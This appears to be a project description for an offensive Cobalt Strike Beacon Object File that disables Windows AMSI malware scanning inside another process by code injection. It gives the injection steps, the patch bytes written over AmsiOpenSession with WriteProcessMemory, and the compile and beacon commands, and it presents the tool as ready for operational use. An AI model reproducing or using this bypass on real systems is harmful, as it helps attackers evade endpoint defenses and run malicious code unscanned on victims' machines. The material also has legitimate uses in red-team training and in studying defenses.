injectAmsiBypass: Cobalt Strike BOF – Inject AMSI Bypass
Cobalt Strike BOF – Inject AMSI Bypass
Cobalt Strike Beacon Object File (BOF) that bypasses AMSI in a remote process with code injection.
Running inject-amsiBypass BOF from CobaltStrike
What does this do?
1. Use supplied PID argument to get a handle on the remote process
2. Load AMSI.DLL into beacons memory and get the address of AMSI.AmsiOpenSession
- Both beacon and the target process will both have the same address for the symbol.
- If AMSI.DLL does not exist in the remote process, running this may crash the target process.
3. Write the AMSI bypass to the remote processes memory
unsigned char amsibypass[] = { 0x48, 0x31, 0xC0 }; // xor rax, rax BOOL success = KERNEL32$WriteProcessMemory(hProc, amsiOpenSessAddr, (PVOID)amsibypass, sizeof(amsibypass), &bytesWritten);
Method = AMSI.AmsiOpenSession
- Uses the AMSI bypass technique taught in Offensive Security’s PEN-300/OSEP (Evasion Techniques and Breaching Defenses) course.
Proof of Concept Demo Screenshots
Before – Powershell.exe AMSI.AmsiOpenSession
After – Powershell.exe AMSI.AmsiOpenSession
Compile with x64 MinGW:
x86_64-w64-mingw32-gcc -c inject-amsiBypass.c -o inject-amsiBypass.o
Run from Cobalt Strike Beacon Console
beacon> inject-amsiBypass <PID>
- Make sure to load the inject-amsiBypass.cna script into Cobalt Strikes Script Manager